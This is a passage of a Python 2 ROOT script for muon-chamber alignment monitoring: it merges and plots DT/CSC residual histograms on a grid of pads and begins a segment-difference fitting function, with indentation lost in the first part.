chamber_dxdz_trackdxdz = chamber_dxdz_trackdxdz.Clone()
chamber_x_trackdydz = chamber_x_trackdydz.Clone()
chamber_dxdz_trackdydz = chamber_dxdz_trackdydz.Clone()
if not not chamber_y_trackx:
chamber_y_trackx = chamber_y_trackx.Clone()
chamber_dydz_trackx = chamber_dydz_trackx.Clone()
chamber_y_tracky = chamber_y_tracky.Clone()
chamber_dydz_tracky = chamber_dydz_tracky.Clone()
chamber_y_trackdxdz = chamber_y_trackdxdz.Clone()
chamber_dydz_trackdxdz = chamber_dydz_trackdxdz.Clone()
chamber_y_trackdydz = chamber_y_trackdydz.Clone()
chamber_dydz_trackdydz = chamber_dydz_trackdydz.Clone()
if not not chamber_y_trackx:
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_trackx")); chamber_x_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_trackx")); chamber_dxdz_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_tracky")); chamber_x_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_tracky")); chamber_dxdz_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_trackdxdz")); chamber_x_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_trackdxdz")); chamber_dxdz_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_trackdydz")); chamber_x_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_trackdydz")); chamber_dxdz_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_trackx")); chamber_y_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_trackx")); chamber_dydz_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_tracky")); chamber_y_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_tracky")); chamber_dydz_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_trackdxdz")); chamber_y_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_trackdxdz")); chamber_dydz_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_trackdydz")); chamber_y_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_trackdydz")); chamber_dydz_trackdydz.Merge(tlist)
else:
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_trackx")); chamber_x_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_trackx")); chamber_dxdz_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_tracky")); chamber_x_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_tracky")); chamber_dxdz_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_trackdxdz")); chamber_x_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_trackdxdz")); chamber_dxdz_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_trackdydz")); chamber_x_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_trackdydz")); chamber_dxdz_trackdydz.Merge(tlist)
rr1=10.
rr2=10.
chamber_x_trackx.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_trackx.SetAxisRange(-rr2, rr2, "Y")
chamber_x_tracky.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_tracky.SetAxisRange(-rr2, rr2, "Y")
chamber_x_trackdxdz.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_trackdxdz.SetAxisRange(-rr2, rr2, "Y")
chamber_x_trackdydz.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_trackdydz.SetAxisRange(-rr2, rr2, "Y")
rr3=10.
if not not chamber_y_trackx:
chamber_y_trackx.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_trackx.SetAxisRange(-rr3, rr3, "Y")
chamber_y_tracky.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_tracky.SetAxisRange(-rr3, rr3, "Y")
chamber_y_trackdxdz.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_trackdxdz.SetAxisRange(-rr3, rr3, "Y")
chamber_y_trackdydz.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_trackdydz.SetAxisRange(-rr3, rr3, "Y")
for h in chamber_x_trackx, chamber_y_trackx, chamber_dxdz_trackx, chamber_dydz_trackx, \
chamber_x_tracky, chamber_y_tracky, chamber_dxdz_tracky, chamber_dydz_tracky, \
chamber_x_trackdxdz, chamber_y_trackdxdz, chamber_dxdz_trackdxdz, chamber_dydz_trackdxdz, \
chamber_x_trackdydz, chamber_y_trackdydz, chamber_dxdz_trackdydz, chamber_dydz_trackdydz:
if not not h:
h.SetMarkerStyle(20)
h.SetMarkerSize(0.5)
h.GetXaxis().SetLabelSize(0.12)
h.GetYaxis().SetLabelSize(0.12)
h.GetXaxis().SetNdivisions(505)
h.GetYaxis().SetNdivisions(505)
h.GetXaxis().SetLabelOffset(0.03)
h.GetYaxis().SetLabelOffset(0.03)
trackdxdz_minimum, trackdxdz_maximum = None, None
for h in chamber_x_trackdxdz, chamber_y_trackdxdz, chamber_dxdz_trackdxdz, chamber_dydz_trackdxdz:
if not not h:
for i in xrange(1, h.GetNbinsX()+1):
if h.GetBinError(i) > 0.01 and h.GetBinContent(i) - h.GetBinError(i) < 10. and \
h.GetBinContent(i) + h.GetBinError(i) > -10.:
if not trackdxdz_minimum or trackdxdz_minimum > h.GetBinCenter(i):
trackdxdz_minimum = h.GetBinCenter(i)
if trackdxdz_maximum < h.GetBinCenter(i):
trackdxdz_maximum = h.GetBinCenter(i)
if not not trackdxdz_minimum and not not trackdxdz_maximum:
for h in chamber_x_trackdxdz, chamber_y_trackdxdz, chamber_dxdz_trackdxdz, chamber_dydz_trackdxdz:
if not not h:
h.SetAxisRange(trackdxdz_minimum, trackdxdz_maximum, "X")
trackdydz_minimum, trackdydz_maximum = None, None
for h in chamber_x_trackdydz, chamber_y_trackdydz, chamber_dxdz_trackdydz, chamber_dydz_trackdydz:
if not not h:
for i in xrange(1, h.GetNbinsX()+1):
if h.GetBinError(i) > 0.01 and h.GetBinContent(i) - h.GetBinError(i) < 10. and \
h.GetBinContent(i) + h.GetBinError(i) > -10.:
if not trackdydz_minimum or trackdydz_minimum > h.GetBinCenter(i):
trackdydz_minimum = h.GetBinCenter(i)
if trackdydz_maximum < h.GetBinCenter(i):
trackdydz_maximum = h.GetBinCenter(i)
if not not trackdydz_minimum and not not trackdydz_maximum:
for h in chamber_x_trackdydz, chamber_y_trackdydz, chamber_dxdz_trackdydz, chamber_dydz_trackdydz:
if not not h:
h.SetAxisRange(trackdydz_minimum, trackdydz_maximum, "X")
for f in chamber_x_trackx_fit2, chamber_y_trackx_fit2, chamber_dxdz_trackx_fit2, chamber_dydz_trackx_fit2, \
chamber_x_tracky_fit2, chamber_y_tracky_fit2, chamber_dxdz_tracky_fit2, chamber_dydz_tracky_fit2, \
chamber_x_trackdxdz_fit2, chamber_y_trackdxdz_fit2, chamber_dxdz_trackdxdz_fit2, chamber_dydz_trackdxdz_fit2, \
chamber_x_trackdydz_fit2, chamber_y_trackdydz_fit2, chamber_dxdz_trackdydz_fit2, chamber_dydz_trackdydz_fit2:
if not not f:
f.SetLineColor(4)
if not not chamber_y_trackx:
c1.Clear()
#c1.Divide(5, 5, 1e-5, 1e-5)
pads = [None]
pads.append(ROOT.TPad("p1" ,"",0.00,0.78,0.07,1.00,0,0,0))
pads.append(ROOT.TPad("p2" ,"",0.07,0.78,0.34,1.00,0,0,0))
pads.append(ROOT.TPad("p3" ,"",0.34,0.78,0.56,1.00,0,0,0))
pads.append(ROOT.TPad("p4" ,"",0.56,0.78,0.78,1.00,0,0,0))
pads.append(ROOT.TPad("p5" ,"",0.78,0.78,1.00,1.00,0,0,0))
pads.append(ROOT.TPad("p6" ,"",0.00,0.56,0.07,0.78,0,0,0))
pads.append(ROOT.TPad("p7" ,"",0.07,0.56,0.34,0.78,0,0,0))
pads.append(ROOT.TPad("p8" ,"",0.34,0.56,0.56,0.78,0,0,0))
pads.append(ROOT.TPad("p9" ,"",0.56,0.56,0.78,0.78,0,0,0))
pads.append(ROOT.TPad("p10","",0.78,0.56,1.00,0.78,0,0,0))
pads.append(ROOT.TPad("p11","",0.00,0.34,0.07,0.56,0,0,0))
pads.append(ROOT.TPad("p12","",0.07,0.34,0.34,0.56,0,0,0))
pads.append(ROOT.TPad("p13","",0.34,0.34,0.56,0.56,0,0,0))
pads.append(ROOT.TPad("p14","",0.56,0.34,0.78,0.56,0,0,0))
pads.append(ROOT.TPad("p15","",0.78,0.34,1.00,0.56,0,0,0))
pads.append(ROOT.TPad("p16","",0.00,0.07,0.07,0.34,0,0,0))
pads.append(ROOT.TPad("p17","",0.07,0.07,0.34,0.34,0,0,0))
pads.append(ROOT.TPad("p18","",0.34,0.07,0.56,0.34,0,0,0))
pads.append(ROOT.TPad("p19","",0.56,0.07,0.78,0.34,0,0,0))
pads.append(ROOT.TPad("p20","",0.78,0.07,1.00,0.34,0,0,0))
pads.append(ROOT.TPad("p21","",0.00,0.00,0.07,0.07,0,0,0))
pads.append(ROOT.TPad("p22","",0.07,0.00,0.34,0.07,0,0,0))
pads.append(ROOT.TPad("p23","",0.34,0.00,0.56,0.07,0,0,0))
pads.append(ROOT.TPad("p24","",0.56,0.00,0.78,0.07,0,0,0))
pads.append(ROOT.TPad("p25","",0.78,0.00,1.00,0.07,0,0,0))
for p in pads:
if not not p:
p.Draw()
ROOT.SetOwnership(p,False)
label1 = ROOT.TPaveLabel(0, 0, 1, 1, "x residuals (mm)","")
label2 = ROOT.TPaveLabel(0, 0, 1, 1, "y residuals (mm)","")
label3 = ROOT.TPaveLabel(0, 0, 1, 1, "dx/dz residuals (mrad)","")
label4 = ROOT.TPaveLabel(0, 0, 1, 1, "dy/dz residuals (mrad)","")
label5 = ROOT.TPaveLabel(0, 0, 1, 1, "x position (cm)","")
label6 = ROOT.TPaveLabel(0, 0, 1, 1, "y position (cm)","")
label7 = ROOT.TPaveLabel(0, 0, 1, 1, "dx/dz angle (rad)","")
label8 = ROOT.TPaveLabel(0, 0, 1, 1, "dy/dz angle (rad)","")
label9 = ROOT.TPaveLabel(0, 0.85, 1, 1, getname(r),"NDC")
for l in label1, label2, label3, label4, label5, label6, label7, label8, label9:
l.SetBorderSize(0)
l.SetFillColor(ROOT.kWhite)
for l in label1, label2, label3, label4:
l.SetTextAngle(90)
l.SetTextSize(0.09)
#label9.SetTextAngle(30)
label9.SetTextSize(0.59)
pads[1].cd(); label1.Draw()
pads[6].cd(); label2.Draw()
pads[11].cd(); label3.Draw()
pads[16].cd(); label4.Draw()
pads[22].cd(); label5.Draw()
pads[23].cd(); label6.Draw()
pads[24].cd(); label7.Draw()
pads[25].cd(); label8.Draw()
pads[2].SetRightMargin(1e-5)
pads[2].SetBottomMargin(1e-5)
pads[2].SetLeftMargin(0.17)
pads[3].SetLeftMargin(1e-5)
pads[3].SetRightMargin(1e-5)
pads[3].SetBottomMargin(1e-5)
pads[4].SetLeftMargin(1e-5)
pads[4].SetRightMargin(1e-5)
pads[4].SetBottomMargin(1e-5)
pads[5].SetLeftMargin(1e-5)
pads[5].SetBottomMargin(1e-5)
pads[7].SetRightMargin(1e-5)
pads[7].SetBottomMargin(1e-5)
pads[7].SetTopMargin(1e-5)
pads[7].SetLeftMargin(0.17)
pads[8].SetLeftMargin(1e-5)
pads[8].SetRightMargin(1e-5)
pads[8].SetBottomMargin(1e-5)
pads[8].SetTopMargin(1e-5)
pads[9].SetLeftMargin(1e-5)
pads[9].SetRightMargin(1e-5)
pads[9].SetBottomMargin(1e-5)
pads[9].SetTopMargin(1e-5)
pads[10].SetLeftMargin(1e-5)
pads[10].SetBottomMargin(1e-5)
pads[10].SetTopMargin(1e-5)
pads[12].SetRightMargin(1e-5)
pads[12].SetBottomMargin(1e-5)
pads[12].SetTopMargin(1e-5)
pads[12].SetLeftMargin(0.17)
pads[13].SetLeftMargin(1e-5)
pads[13].SetRightMargin(1e-5)
pads[13].SetBottomMargin(1e-5)
pads[13].SetTopMargin(1e-5)
pads[14].SetLeftMargin(1e-5)
pads[14].SetRightMargin(1e-5)
pads[14].SetBottomMargin(1e-5)
pads[14].SetTopMargin(1e-5)
pads[15].SetLeftMargin(1e-5)
pads[15].SetBottomMargin(1e-5)
pads[15].SetTopMargin(1e-5)
pads[17].SetRightMargin(1e-5)
pads[17].SetTopMargin(1e-5)
pads[17].SetLeftMargin(0.17)
pads[18].SetLeftMargin(1e-5)
pads[18].SetRightMargin(1e-5)
pads[18].SetTopMargin(1e-5)
pads[19].SetLeftMargin(1e-5)
pads[19].SetRightMargin(1e-5)
pads[19].SetTopMargin(1e-5)
pads[20].SetLeftMargin(1e-5)
pads[20].SetTopMargin(1e-5)
chamber_x_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
# chamber_dydz_trackx
chamber_dydz_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dydz_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dydz_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
pads[2].cd()
chamber_x_trackx.Draw("e1")
if not suppressblue: chamber_x_trackx_fit2.Draw("samel")
chamber_x_trackx_fit.Draw("samel")
#label99 = ROOT.TPaveLabel(0, 0.8, 1, 1, getname(r),"NDC")
print getname(r)
#label99 = ROOT.TPaveLabel(0, 0.8, 1, 1, "aaa","NDC")
label9.Draw()
#pads[2].Modified()
pads[3].cd()
chamber_x_tracky.Draw("e1")
if not suppressblue: chamber_x_tracky_fit2.Draw("samel")
chamber_x_tracky_fit.Draw("samel")
pads[4].cd()
chamber_x_trackdxdz.Draw("e1")
if not suppressblue: chamber_x_trackdxdz_fit2.Draw("samel")
chamber_x_trackdxdz_fit.Draw("samel")
pads[5].cd()
chamber_x_trackdydz.Draw("e1")
if not suppressblue: chamber_x_trackdydz_fit2.Draw("samel")
chamber_x_trackdydz_fit.Draw("samel")
pads[7].cd()
chamber_y_trackx.Draw("e1")
if not suppressblue: chamber_y_trackx_fit2.Draw("samel")
chamber_y_trackx_fit.Draw("samel")
pads[8].cd()
chamber_y_tracky.Draw("e1")
if not suppressblue: chamber_y_tracky_fit2.Draw("samel")
chamber_y_tracky_fit.Draw("samel")
pads[9].cd()
chamber_y_trackdxdz.Draw("e1")
if not suppressblue: chamber_y_trackdxdz_fit2.Draw("samel")
chamber_y_trackdxdz_fit.Draw("samel")
pads[10].cd()
chamber_y_trackdydz.Draw("e1")
if not suppressblue: chamber_y_trackdydz_fit2.Draw("samel")
chamber_y_trackdydz_fit.Draw("samel")
pads[12].cd()
chamber_dxdz_trackx.Draw("e1")
if not suppressblue: chamber_dxdz_trackx_fit2.Draw("samel")
chamber_dxdz_trackx_fit.Draw("samel")
pads[13].cd()
chamber_dxdz_tracky.Draw("e1")
if not suppressblue: chamber_dxdz_tracky_fit2.Draw("samel")
chamber_dxdz_tracky_fit.Draw("samel")
pads[14].cd()
chamber_dxdz_trackdxdz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdxdz_fit2.Draw("samel")
chamber_dxdz_trackdxdz_fit.Draw("samel")
pads[15].cd()
chamber_dxdz_trackdydz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdydz_fit2.Draw("samel")
chamber_dxdz_trackdydz_fit.Draw("samel")
pads[17].cd()
chamber_dydz_trackx.Draw("e1")
if not suppressblue: chamber_dydz_trackx_fit2.Draw("samel")
chamber_dydz_trackx_fit.Draw("samel")
pads[18].cd()
chamber_dydz_tracky.Draw("e1")
if not suppressblue: chamber_dydz_tracky_fit2.Draw("samel")
chamber_dydz_tracky_fit.Draw("samel")
pads[19].cd()
chamber_dydz_trackdxdz.Draw("e1")
if not suppressblue: chamber_dydz_trackdxdz_fit2.Draw("samel")
chamber_dydz_trackdxdz_fit.Draw("samel")
pads[20].cd()
chamber_dydz_trackdydz.Draw("e1")
if not suppressblue: chamber_dydz_trackdydz_fit2.Draw("samel")
chamber_dydz_trackdydz_fit.Draw("samel")
else:
c1.Clear()
#c1.Divide(5, 3, 1e-5, 1e-5)
pads = [None]
pads.append(ROOT.TPad("p1" ,"",0.00,0.55,0.07,1.00,0,0,0))
pads.append(ROOT.TPad("p2" ,"",0.07,0.55,0.34,1.00,0,0,0))
pads.append(ROOT.TPad("p3" ,"",0.34,0.55,0.56,1.00,0,0,0))
pads.append(ROOT.TPad("p4" ,"",0.56,0.55,0.78,1.00,0,0,0))
pads.append(ROOT.TPad("p5" ,"",0.78,0.55,1.00,1.00,0,0,0))
pads.append(ROOT.TPad("p6" ,"",0.00,0.1,0.07,0.55,0,0,0))
pads.append(ROOT.TPad("p7" ,"",0.07,0.1,0.34,0.55,0,0,0))
pads.append(ROOT.TPad("p8" ,"",0.34,0.1,0.56,0.55,0,0,0))
pads.append(ROOT.TPad("p9" ,"",0.56,0.1,0.78,0.55,0,0,0))
pads.append(ROOT.TPad("p10","",0.78,0.1,1.00,0.55,0,0,0))
pads.append(ROOT.TPad("p11","",0.00,0.,0.07,0.1,0,0,0))
pads.append(ROOT.TPad("p12","",0.07,0.,0.34,0.1,0,0,0))
pads.append(ROOT.TPad("p13","",0.34,0.,0.56,0.1,0,0,0))
pads.append(ROOT.TPad("p14","",0.56,0.,0.78,0.1,0,0,0))
pads.append(ROOT.TPad("p15","",0.78,0.,1.00,0.1,0,0,0))
for p in pads:
if not not p:
p.Draw()
ROOT.SetOwnership(p,False)
label1 = ROOT.TPaveLabel(0, 0, 1, 1, "x residuals (mm)")
label2 = ROOT.TPaveLabel(0, 0, 1, 1, "dx/dz residuals (mrad)")
label3 = ROOT.TPaveLabel(0, 0.3, 1, 1, "x position (cm)")
label4 = ROOT.TPaveLabel(0, 0.3, 1, 1, "y position (cm)")
label5 = ROOT.TPaveLabel(0, 0.3, 1, 1, "dx/dz angle (rad)")
label6 = ROOT.TPaveLabel(0, 0.3, 1, 1, "dy/dz angle (rad)")
label9 = ROOT.TPaveLabel(0, 0.85, 1, 1, getname(r),"NDC")
if name[0:2] == "ME":
label1 = ROOT.TPaveLabel(0, 0, 1, 1, "r#phi residuals (mm)")
label2 = ROOT.TPaveLabel(0, 0, 1, 1, "d(r#phi)/dz residuals (mrad)")
for l in label1, label2, label3, label4, label5, label6, label9:
l.SetBorderSize(0)
l.SetFillColor(ROOT.kWhite)
for l in label1, label2:
l.SetTextAngle(90)
l.SetTextSize(0.09)
#label9.SetTextAngle(30)
label9.SetTextSize(0.29)
pads[1].cd(); label1.Draw()
pads[6].cd(); label2.Draw()
pads[12].cd(); label3.Draw()
pads[13].cd(); label4.Draw()
pads[14].cd(); label5.Draw()
pads[15].cd(); label6.Draw()
#pads[11].cd(); label9.Draw()
pads[2].SetRightMargin(1e-5)
pads[2].SetBottomMargin(1e-5)
pads[3].SetLeftMargin(1e-5)
pads[3].SetRightMargin(1e-5)
pads[3].SetBottomMargin(1e-5)
pads[4].SetLeftMargin(1e-5)
pads[4].SetRightMargin(1e-5)
pads[4].SetBottomMargin(1e-5)
pads[5].SetLeftMargin(1e-5)
pads[5].SetBottomMargin(1e-5)
pads[7].SetRightMargin(1e-5)
pads[7].SetTopMargin(1e-5)
pads[8].SetLeftMargin(1e-5)
pads[8].SetRightMargin(1e-5)
pads[8].SetTopMargin(1e-5)
pads[9].SetLeftMargin(1e-5)
pads[9].SetRightMargin(1e-5)
pads[9].SetTopMargin(1e-5)
pads[10].SetLeftMargin(1e-5)
pads[10].SetTopMargin(1e-5)
chamber_x_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
# chamber_dxdz_trackx
chamber_dxdz_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
pads[2].cd()
chamber_x_trackx.Draw("e1")
if not suppressblue: chamber_x_trackx_fit2.Draw("samel")
chamber_x_trackx_fit.Draw("samel")
label9.Draw()
pads[3].cd()
chamber_x_tracky.Draw("e1")
if not suppressblue: chamber_x_tracky_fit2.Draw("samel")
chamber_x_tracky_fit.Draw("samel")
pads[4].cd()
chamber_x_trackdxdz.Draw("e1")
if not suppressblue: chamber_x_trackdxdz_fit2.Draw("samel")
chamber_x_trackdxdz_fit.Draw("samel")
pads[5].cd()
chamber_x_trackdydz.Draw("e1")
if not suppressblue: chamber_x_trackdydz_fit2.Draw("samel")
chamber_x_trackdydz_fit.Draw("samel")
pads[7].cd()
chamber_dxdz_trackx.Draw("e1")
if not suppressblue: chamber_dxdz_trackx_fit2.Draw("samel")
chamber_dxdz_trackx_fit.Draw("samel")
pads[8].cd()
chamber_dxdz_tracky.Draw("e1")
if not suppressblue: chamber_dxdz_tracky_fit2.Draw("samel")
chamber_dxdz_tracky_fit.Draw("samel")
pads[9].cd()
chamber_dxdz_trackdxdz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdxdz_fit2.Draw("samel")
chamber_dxdz_trackdxdz_fit.Draw("samel")
pads[10].cd()
chamber_dxdz_trackdydz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdydz_fit2.Draw("samel")
chamber_dxdz_trackdydz_fit.Draw("samel")
tn = time.time()
ddt[8] = 1./ddt[7]*((ddt[7]-1)*ddt[8] + tn-t1)
##################################################################################
def segdiff(tfiles, component, pair, **args):
    """Fit segment-difference distributions for one station pair and draw them.

    Reads the pair histograms from the AlignmentMonitorSegmentDifferences
    directory of every file in tfiles, sums them, and fills the globals
    tmpprof (profile vs. q/pT), tmppos and tmpneg (positive/negative muon
    distributions).  Draws everything on the global canvas c1 (profile on
    the left pad, pos/neg on the right) and fits a line to the profile and
    a restricted-range Gaussian to each charge distribution.

    Arguments:
      tfiles    -- list of open ROOT files with the monitoring output
      component -- "dt13_resid", "dt13_slope", "dt2_resid", "dt2_slope",
                   "csc_resid" or "csc_slope"
      pair      -- two-digit station pair, e.g. 12 = station 1 minus station 2
      args      -- DT: wheel, sector; CSC: endcap ("p"/"m"), ring (1 or 2),
                   chamber; optional: window (profile y half-range, default 5.)

    Returns (phi, value, error, value2, error2, fit1ok, fit2ok, fit3ok):
    phi is the average azimuth of the pair, (value, error) the intercept of
    the profile fit, (value2, error2) the charge-averaged Gaussian peak, and
    the three flags report convergence of the three fits.
    """
    tdrStyle.SetOptFit(1)
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(1)
    tdrStyle.SetTitleFontSize(0.05)
    tdrStyle.SetStatW(0.2)
    tdrStyle.SetStatY(0.9)
    tdrStyle.SetStatFontSize(0.06)

    if component[0:2] == "dt":
        wheel = args["wheel"]
        wheelletter = wheelLetter(wheel)
        sector = args["sector"]
        profname = "%s_%s_%02d_%s" % (component, wheelletter, sector, str(pair))
        posname = "pos" + profname
        negname = "neg" + profname

        station1 = int(str(pair)[0])
        station2 = int(str(pair)[1])

        # average phi of the two chambers, unwrapping across the -pi/pi seam
        phi1 = signConventions["DT", wheel, station1, sector][4]
        phi2 = signConventions["DT", wheel, station2, sector][4]
        if abs(phi1 - phi2) > 1.:
            if phi1 > phi2: phi1 -= 2.*pi
            else: phi1 += 2.*pi
        phi = (phi1 + phi2) / 2.
        while (phi < -pi): phi += 2.*pi
        while (phi > pi): phi -= 2.*pi

    elif component[0:3] == "csc":
        endcap = args["endcap"]
        if endcap=="m":
            endcapnum=2
            endcapsign="-"
        elif endcap=="p":
            endcapnum=1
            endcapsign="+"
        else: raise Exception

        ring = args["ring"]
        if ring>2 or ring<1: raise Exception
        station1 = int(str(pair)[0])
        station2 = int(str(pair)[1])
        if ring==1: ringname="inner"
        elif ring==2: ringname="outer"
        else: raise Exception

        chamber = args["chamber"]
        # inner rings have 18 chambers, outer rings 36
        if (ring==1 and chamber>18) or (ring==2 and chamber>36): raise Exception

        profname = "csc%s_%s_%s_%02d_%s" % (ringname,component[4:], endcap, chamber, str(pair))
        posname = "pos" + profname
        negname = "neg" + profname

        # average phi of the two chambers, unwrapping at the CSC seam (-5 deg)
        phi1 = signConventions["CSC", endcapnum, station1, ring, chamber][4]
        phi2 = signConventions["CSC", endcapnum, station2, ring, chamber][4]
        if abs(phi1 - phi2) > 1.:
            if phi1 > phi2: phi1 -= 2.*pi
            else: phi1 += 2.*pi
        phi = (phi1 + phi2) / 2.
        while (phi < -pi*5./180.): phi += 2.*pi
        while (phi > pi*(2.-5./180.)): phi -= 2.*pi

    else: raise Exception

    if "window" in args: window = args["window"]
    else: window = 5.

    global tmpprof, tmppos, tmpneg
    pdir = "AlignmentMonitorSegmentDifferences/iter1/"
    tmpprof = tfiles[0].Get(pdir + profname).Clone()
    tmpprof.SetMarkerStyle(8)
    tmppos = tfiles[0].Get(pdir + posname).Clone()
    tmpneg = tfiles[0].Get(pdir + negname).Clone()
    for tfile in tfiles[1:]:
        tmpprof.Add(tfile.Get(pdir + profname))
        tmppos.Add(tfile.Get(pdir + posname))
        tmpneg.Add(tfile.Get(pdir + negname))

    # blow up the error of (near-)empty profile bins so they don't pull the fit
    for i in xrange(1, tmpprof.GetNbinsX()+1):
        if tmpprof.GetBinError(i) < 1e-5:
            tmpprof.SetBinError(i, 100.)
    tmpprof.SetAxisRange(-window, window, "Y")

    # straight-line fit over the (symmetric) q/pT axis of the profile
    f = ROOT.TF1("p1", "[0] + [1]*x", tmpprof.GetBinLowEdge(1), -tmpprof.GetBinLowEdge(1))
    f.SetParameters((tmppos.GetMean() + tmpneg.GetMean())/2., 0.)

    tmpprof.SetXTitle("q/p_{T} (c/GeV)")
    if component == "dt13_resid":
        tmpprof.SetYTitle("#Deltax^{local} (mm)")
        tmppos.SetXTitle("#Deltax^{local} (mm)")
        tmpneg.SetXTitle("#Deltax^{local} (mm)")
        f.SetParNames("#Deltax^{local}_{0}", "Slope")
    if component == "dt13_slope":
        tmpprof.SetYTitle("#Deltadx/dz^{local} (mrad)")
        tmppos.SetXTitle("#Deltadx/dz^{local} (mrad)")
        tmpneg.SetXTitle("#Deltadx/dz^{local} (mrad)")
        f.SetParNames("#Deltadx/dz^{local}_{0}", "Slope")
    if component == "dt2_resid":
        tmpprof.SetYTitle("#Deltay^{local} (mm)")
        tmppos.SetXTitle("#Deltay^{local} (mm)")
        tmpneg.SetXTitle("#Deltay^{local} (mm)")
        f.SetParNames("#Deltay^{local}_{0}", "Slope")
    if component == "dt2_slope":
        tmpprof.SetYTitle("#Deltady/dz^{local} (mrad)")
        tmppos.SetXTitle("#Deltady/dz^{local} (mrad)")
        tmpneg.SetXTitle("#Deltady/dz^{local} (mrad)")
        f.SetParNames("#Deltady/dz^{local}_{0}", "Slope")
    if component == "csc_resid":
        tmpprof.SetXTitle("q/p_{z} (c/GeV)")
        tmpprof.SetYTitle("#Delta(r#phi)^{local} (mm)")
        tmppos.SetXTitle("#Delta(r#phi)^{local} (mm)")
